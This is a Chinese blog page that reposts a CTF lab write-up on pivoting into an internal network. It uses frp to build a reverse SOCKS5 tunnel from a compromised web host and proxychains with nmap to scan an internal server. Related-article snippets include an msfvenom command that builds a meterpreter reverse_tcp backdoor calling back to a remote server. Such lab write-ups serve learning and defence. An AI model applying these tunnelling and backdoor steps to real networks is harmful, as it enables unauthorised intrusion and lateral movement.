内网反向代理的一些整理(深入理解反向代理)

最新推荐文章于 2024-07-24 18:17:18 发布
最新推荐文章于 2024-07-24 18:17:18 发布
阅读量266 收藏
点赞数
文章标签: 网络
原文链接:http://www.cnblogs.com/R1card0/p/10531928.html
版权

 

 

这几天在搞BCTF,是一个简单的内网环境,放到国内,基本小厂的网络拓扑也就这个。

 

 

 

 

 

 

 

环境详情

  • 攻击端192.168.16.103
  • 外部的防火墙(出口主机)192.168.16.118
  • Web端172.16.10.2 对外映射80端口到192.168.16.118
  • Sever端172.16.10.3

内网里面就两台主机一台Server和一台Web,Sever仅对Web开放3306端口,攻击者只能通过访问Web主机映射到防火墙的80端口。

攻击思路:通过web端的RCE设置一个反向代理,进一步实现对Sever主机的攻击。

由于外部无法直接与172.16.10.3通信。但是172.16.10.2可以与192.168.16.111通信(此处解释一下

  • 主要是172处于内网环境,攻击者只能攻击处于公网(192)上的机器,但是内网的机器只要网络出口处没有限制对外面的访问时没有限制的)

进入本文的主题:反向代理的解决思路

开源工具:frp https://github.com/fatedier/frp/releases

稍微介绍一下这个脚本

frpc 是放在客户端的,配置文件frpc.ini 里面需要指定请求的代理服务器的IP地址:

frpc.ini内容如下:

frps是放在服务端的,配置文件 frps.init里面需要指定服务端监听的端口

frps.init内容如下

 

此处需要反向代理建立socke5通道,实现代理访问内网中的sever服务器。

所以需要填写请求IP的客户端需要放在Web机器上面,去请求外部的攻击者的主机建立隧道实现代理攻击。

使用prxoychains + namp测试代理连接的强度

proxychains nmap -sT -Pn 172.16.10.3

 

可以成功扫描Server主机的端口,连接强度能够应对多个nmap扫描脚本的扫描。

--------------------------------------------------------------------------------------------------------------------------------

另外一种实现入侵内网的思路是:只开放80端口的主机拿到权限之后上传木马后,上传frps

补充一下socke5和http代理的知识:

  • SOCKS作用在OSI模型的第五层也就是会话层上
  • socke5使用的tcp与udp包转发,socke4使用的是tcp的包转发
  • Socks 代理与应用层代理、 HTTP 在应用层,层代理不同,Socks 代理只是简单地传递数据包,而不必关心是何种应用协议(比如FTP、HTTP和NNTP请求)。所以,Socke代理比其他应用层代理要快得多。

这也是我一开始想要验证socke5代理是否真正能够传输数据的碰到的一个坑,我直接连接之后,使用proxychains ping 172.16.10.2发现根本ping不通,原因在于ping命令使用的是icmp协议,

亟待需要静静看看网络七层协议,时间都是挤出来的。

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------

转载于:https://www.cnblogs.com/R1card0/p/10531928.html

aikandu9426
关注
Go-简单的反向代理用于内网穿透
08-14
本篇文章将深入探讨如何使用Go语言创建一个简单的反向代理,实现内网穿透。 首先,我们要理解什么是反向代理反向代理是位于服务器和客户端之间的一个中间层,客户端对反向代理发起请求,然后代理会转发这些请求到...
Nginx (一) 正向代理 & 反向代理 及配置
01-07
反向代理 反向代理配置 介绍Nginx Nginx是一款自由的、开源的、高性能的HTTP服务器和 反向代理 服务器;同时也是一个IMAP、POP3、SMTP代理服务器;Nginx可以作为一个HTTP服务器进行网站的发布处理,另外Nginx可以...
反向代理服务器(Reverse Proxy)
03-10 760
反向代理服务器(Reverse Proxy) 普通代理服务器是帮助内部网络的计算机访问外部网络。通常,代理服务器同时连接内网和外网。首先内网的计算机需要设置代理服务器地址和端口,然后将HTTP请求...
内网安全:代理技术详解
baimao__Ch的博客
07-24 1032
背景:拿下内网的一个主机权限并且上线到MSF/CS上,IP:192.168.x.*使用控制192.168.x.*的Meterpreter启动路由,MSF相当于进入到该网段中开启节点,支持代理来的转发流量攻击机A(外网,军火库)配置代理到MSF上CS代理建立:有手就行在192.168.x.*的会话上开启SOCKS代理在攻击机A上配置代理装置建立通讯的最大意义就是:可以实现攻击机与内网主机的通讯,有了通讯才能横向移动要根据防火墙因地制宜的选择方式。
使用反向代理发布内网服务
shanyou的专栏
09-22 429
<br />DMZ是英文“demilitarizedzone”的缩写,中文名称为“隔离区”,也称“非军事化区”。它是为了解决安装防火墙后外部网络不能访问内部网络服务器的问题,而设立的一个非安全系统与安全系统之间的缓冲区,这个缓冲区位于企业内部网络和外部网络之间的小网络区域内,在这个小网络区域内可以放置一些必须公开的服务器设施,如企业Web服务器、FTP服务器和论坛等。另一方面,通过这样一个DMZ区域,更加有效地保护了内部网络,因为这种网络部署,比起一般的防火墙方案,对攻击者来说又多了一道关卡。<br />通
Nginx配置-局域网内反向代理服务器
Kamy Shi
10-19 1890
Nginx配置 局域网内反向代理服务器 1、下载安装Nginx brew install nginx 2、配置Nginx 1、进入nginx的安装目录,打开nginx.conf文件 cd /usr/local/etc/nginx/ sudo vim nginx.conf 2、进行配置,修改访问端口和服务对应地址 其中主要修改了server里面的内容,server.listen 为端口号,此处我修...
内网渗透(一)反向代理实现外网访问到内网
m0_63699746的博客
08-02 1296
msfvenom -p windows/meterpreter/reverser_tcp LHOST=你的云服务器ip LPORT=3333(端口自定) -f exe > msf.exe ,生成的后门放到a虚拟机中。总结:首先攻击端(服务器)攻击具有内网和外网的虚拟机,取得权限,然后进行对另一台在同一内网的虚拟机进行渗透,通过开启隧道(也就是建立节点),让宿主机连接作为跳板的攻击机,来实现访问另一台内网上的虚拟机。攻击机(服务器)使用msf生成后门,放到a虚拟机中,点开与运行上线。
基于Netty框架的Java内网穿透与反向代理工具设计源码
最新发布
09-26
该项目是一款基于Netty框架开发的Java内网穿透与反向代理工具设计源码,总计包含117个文件,涵盖70个Java源文件、9个PNG图片文件、8个XML配置文件、4个Markdown文件、4个CRT证书文件、3个HTML文件以及少量其他类型...
基于Java开发的一款基于Netty的内网穿透工具,主要用于将内网服务反向代理到公网访问.zip
03-23
深入研究这些源代码可以帮助我们理解工具的具体实现细节。 总的来说,这款基于Java和Netty的内网穿透工具利用了Java的强大能力和Netty的高效网络框架,为用户提供了一种便捷的途径,使内网服务能够被公网访问。它的...
基于Netty实现的内网穿透&反向代理的工具 (支持TCP上层协议和HTTP的穿透式反向代理).zip
05-31
基于Netty实现的内网穿透&反向代理的工具 (支持TCP上层协议和HTTP的穿透式反向代理).zip
内网穿透:FRP(Forwarding Remote Proxy)反向代理
原来是肖哈哈的博客
09-04 2503
frp内网穿透教程。FRP是一个可用于内网穿透的高性能的反向代理应用,支持 tcp, udp 协议,为 http 和 https 应用协议提供了额外的能力,且尝试性支持了点对点穿透。
反向代理
hyz792901324的博客
01-07 382
1.为什么需要代理 A-->B 无法访问 C-->B 可以访问 A-->C 可以访问C A如果想访问B就可以通过C来访问 A-->C-->B C就是代理 2.代理类型 服务器/程序---->C----->其他服务器 这是正向代理,也就是通常用的翻墙 客户端--->C--->服务器 这...
内网穿透、反向代理(ngrok服务器搭建)
热门推荐
xiahailong90的博客
01-19 1万+
内网穿透的目的是:让外网能访问你本地的应用,例如在外网打开你本地http://127.0.0.1指向的Web站点。一、ngrokngrok是一个反向代理,通过在公共的端点和本地运行的Web服务器之间建立一个安全的通道。ngrok可捕获和分析所有通道上的流量,便于后期分析与响应。开源免费官网:https://ngrok.com/源码:https://github.com/inconshreveabl
frp内网代理-一层反向代理 实战篇
千寻的博客
10-06 2189
假设:目前已获取边界服务器(192.168.0.104)的权限实现:通过frp做反向代理,实现192.168.0.107外网主机–成功访问内网oa系统–内网192.168.52.30系统frp下载地址。
frp内网穿透之(反向代理nginx)
weixin_39255905的博客
04-02 2227
​ 如果没有报错,代表启动成功!云服务器,配置规则记得也要开放。​ 其中 frps.toml 文件就是我们服务端的配置文件,我们需要根据自己情况稍作修改。可以手动下载到本地,然后通过scp命令传到服务器,也可以直接在外网服务器上下载。如果你使用的是windows系统,配置和启动方法一样。​ 其中作为服务端,我们只需要关注 frps 和 frps.toml 文件。​ 此时frp的服务端我们就配置完毕了,接下来开始配置客户端。​ 注意:配置项并未介绍完,详情请参见官方文档。​ 如控制台未报错,代表启动成功,
frp反向代理内网,使用内网的jupyterhub
TH_NUM的博客
02-28 1227
其中jupyterhub 安装和使用可以参考这里 针对实际使用中,遇到如下场景,想让其他人测试在本地搭建的WEB服务,由于本地机器没有公网IP,无法域名解析到本地机器。可通过反向代理的方式,实现此功能。比如使用内网的jupyterhub. FRP 是一个可用于内网穿透的高性能的反向代理应用,支持 TCP, UDP 协议,为 HTTP 和 HTTPS 应用协议提供了额外的能力,且尝试性支持了点对点穿...
内网穿透】使用神卓互联和Nginx搭建局域网应用反向代理
m0_74288482的博客
04-01 307
使用神卓互联的内网穿透服务,可以将内部应用映射到外网上,方便外部用户访问。而Nginx则是一款高性能的反向代理服务器,可以将外部请求代理到内部的应用服务上,使得内部应用可以通过外部访问。本文将介绍如何使用神卓互联和Nginx实现局域网应用反向代理
NAS设置内网穿透 | Nginx反向代理 | 外网访问 | 配置华为云服务器
shanbuzaigao_cn的博客
09-21 1942
在日常使用NAS时,相信大家通过外部网络访问NAS也是必备需求。但又苦于没有公网IP,向运营商申请又比较困难,所以在这里分享一个Nginx+Frp的内网穿透解决方案(网上也有很多介绍,这里详细写下个人的配置流程,尽量避免踩坑)
nginx 反向代理 怎么内网穿透
09-20
Nginx 反向代理是一种常见的网络架构设计,主要用于负载均衡、URL重定向和内部服务间的通信。在某些场景下,如果想要让内网的服务可以通过公网访问(即内网穿透),你可以按照以下步骤配置 Nginx: 1. **环境准备**: - 确保你已经在服务器上安装了 Nginx。 - 需要有一个公网IP地址,或者已经设置了端口映射(如NAT、DMZ等)。 2. **配置 Nginx**: 在 Nginx 的配置文件(一般为 `nginx.conf` 或 `sites-available/your-site.conf`)中,新建或编辑一个虚拟主机块(server block)。设置如下示例配置: ```nginx server { listen 80; # 公网监听的端口,根据实际情况更改 server_name yourdomain.com; # 替换为你自己的域名 location / { proxy_pass http://your_internal_ip:internal_port; # 内网服务的 IP 和端口 proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; } # 如果需要 SSL/TLS,添加以下内容 # ssl_certificate_path /path/to/certificate; # ssl_certificate_key_path /path/to/key; # 错误页面处理 error_page 502 /502.html; location = /502.html { root /usr/share/nginx/html; # 默认路径,也可以自定义 } } ``` 3. **重启 Nginx**: 修改完配置后,执行 `sudo service nginx reload` 或者 `sudo systemctl restart nginx` 命令使新配置生效。 4. **测试**: 尝试从公网访问 `http://yourdomain.com`,Nginx 应该会转发请求到内网指定的服务器并返回响应。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值